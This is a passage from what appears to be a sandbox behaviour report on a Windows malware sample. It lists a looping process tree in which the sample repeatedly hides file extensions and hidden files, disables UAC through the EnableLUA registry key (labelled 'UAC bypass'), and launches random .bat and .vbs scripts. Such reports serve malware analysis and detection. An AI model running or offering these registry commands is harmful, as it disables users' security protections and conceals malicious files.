        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        138⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2160
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        138⤵
        Modifies registry key
        
        PID:2752
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        138⤵
        UAC bypass
        
        PID:1128
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IEgQYsws.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        138⤵
        
        PID:748
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        139⤵
        
        PID:4116
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        136⤵
        
        PID:4196
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        136⤵
        
        PID:244
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        136⤵
        Modifies registry key
        
        PID:3440
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PsoEgIIo.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        136⤵
        
        PID:3148
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        137⤵
        
        PID:4212
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        134⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1840
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        134⤵
        
        PID:324
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        134⤵
        
        PID:1276
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nOMUUwcY.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        134⤵
        
        PID:2748
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        135⤵
        
        PID:3464
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        132⤵
        
        PID:3884
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        132⤵
        
        PID:4796
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        132⤵
        
        PID:420
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VsIIwYcI.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        132⤵
        
        PID:2700
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        133⤵
        
        PID:3868
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        130⤵
        
        PID:1360
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        130⤵
        
        PID:4760
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        130⤵
        
        PID:3196
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jEIAkIEA.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        130⤵
        
        PID:3648
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        131⤵
        
        PID:2196
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        128⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2232
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        128⤵
        
        PID:3532
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        128⤵
        UAC bypass
        
        PID:1420
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kEUkgcwk.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        128⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        129⤵
        
        PID:1140
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        126⤵
        
        PID:3464
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        126⤵
        
        PID:4300
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        126⤵
        
        PID:3108
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MKgcogEQ.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        126⤵
        
        PID:4184
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        127⤵
        
        PID:244
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        124⤵
        
        PID:3172
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        124⤵
        Modifies registry key
        
        PID:4956
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        124⤵
        Modifies registry key
        
        PID:2316
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GkQYIMkY.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        124⤵
        
        PID:2336
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        125⤵
        
        PID:2512
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        122⤵
        Modifies registry key
        
        PID:952
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        122⤵
        
        PID:3556
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        122⤵
        UAC bypass
        
        PID:4416
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PssMIEwg.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        122⤵
        
        PID:3580
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        123⤵
        
        PID:2180
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        120⤵
        
        PID:5008
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        120⤵
        
        PID:4608
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        120⤵
        
        PID:784
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tcwAUYoI.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        120⤵
        
        PID:4700
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        121⤵
        
        PID:2268
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        118⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2524
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        118⤵
        
        PID:1728
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        118⤵
        
        PID:4508
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zygIMEsk.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        118⤵
        
        PID:1140
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        119⤵
        
        PID:2884
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        116⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:3332
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        116⤵
        
        PID:848
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        116⤵
        Modifies registry key
        
        PID:1116
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xGUIsUgE.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        116⤵
        
        PID:3284
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        117⤵
        
        PID:2084
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        114⤵
        
        PID:1792
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        114⤵
        
        PID:2416
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        114⤵
        
        PID:1640
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SiEEIYoA.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        114⤵
        
        PID:1020
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        115⤵
        
        PID:3320
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        112⤵
        
        PID:3996
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        112⤵
        
        PID:4976
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        112⤵
        
        PID:1436
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UIQEMYgM.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        112⤵
        
        PID:4172
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        113⤵
        
        PID:324
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        110⤵
        
        PID:3916
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        110⤵
        
        PID:3908
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        110⤵
        UAC bypass
        
        PID:3356
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SKsMIgAw.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        110⤵
        
        PID:1304
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        111⤵
        
        PID:3808
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        108⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4604
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        108⤵
        
        PID:4672
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        108⤵
        UAC bypass
        
        PID:4904
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nockYIsc.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        108⤵
        
        PID:4828
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        109⤵
        
        PID:4364
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        106⤵
        
        PID:4068
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        106⤵
        
        PID:2172
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        106⤵
        
        PID:3596
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VukgwwMg.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        106⤵
        
        PID:4764
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        107⤵
        
        PID:2392
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        104⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2232
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        104⤵
        
        PID:4716
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        104⤵
        
        PID:2156
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rqcggQwo.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        104⤵
        
        PID:4860
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        105⤵
        
        PID:3560
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        102⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4392
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        102⤵
        
        PID:4380
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        102⤵
        
        PID:2472
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XCMAgEwo.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        102⤵
        
        PID:3788
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        103⤵
        
        PID:4840
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        100⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1872
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        100⤵
        
        PID:1840
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        100⤵
        
        PID:3012
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WyMoYUgY.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        100⤵
        
        PID:4348
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        101⤵
        
        PID:4940
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        98⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3064
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        98⤵
        
        PID:1960
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        98⤵
        
        PID:5068
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qmYEIIog.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        98⤵
        
        PID:1124
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        99⤵
        
        PID:424
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        96⤵
        
        PID:1044
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        96⤵
        
        PID:2412
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        96⤵
        UAC bypass
        
        PID:5056
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AqQMwwME.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        96⤵
        
        PID:916
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        97⤵
        
        PID:3036
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        94⤵
        
        PID:1012
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        94⤵
        
        PID:4068
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        94⤵
        UAC bypass
        Modifies registry key
        
        PID:4212
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ooUcswws.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        94⤵
        
        PID:2252
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        95⤵
        
        PID:1140
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        92⤵
        Modifies registry key
        
        PID:2460
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        92⤵
        
        PID:3152
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        92⤵
        UAC bypass
        Modifies registry key
        
        PID:2156
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RIEcwkIA.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        92⤵
        
        PID:4192
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        93⤵
        
        PID:3600
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        90⤵
        
        PID:1320
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        90⤵
        
        PID:1968
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        90⤵
        Modifies registry key
        
        PID:4380
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Takgwskk.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        90⤵
        
        PID:1552
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        91⤵
        
        PID:4300
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        88⤵
        
        PID:4800
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        88⤵
        
        PID:3132
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        88⤵
        UAC bypass
        Modifies registry key
        
        PID:1672
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FeoAAAYQ.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        88⤵
        
        PID:2468
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        89⤵
        
        PID:1080
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        86⤵
        Modifies registry key
        
        PID:3188
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        86⤵
        
        PID:3808
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        86⤵
        UAC bypass
        
        PID:3032
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EKkkQYss.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        86⤵
        
        PID:1440
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        87⤵
        
        PID:3356
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        84⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2824
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        84⤵
        
        PID:2412
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        84⤵
        UAC bypass
        
        PID:2236
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OCEcsgoU.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        84⤵
        
        PID:784
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        85⤵
        
        PID:2308
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        82⤵
        
        PID:1116
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        82⤵
        Modifies registry key
        
        PID:4732
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        82⤵
        
        PID:1224
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iYEUIcwk.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        82⤵
        
        PID:3824
        
        C:\Windows\SysWOW64\cscript.exe
        
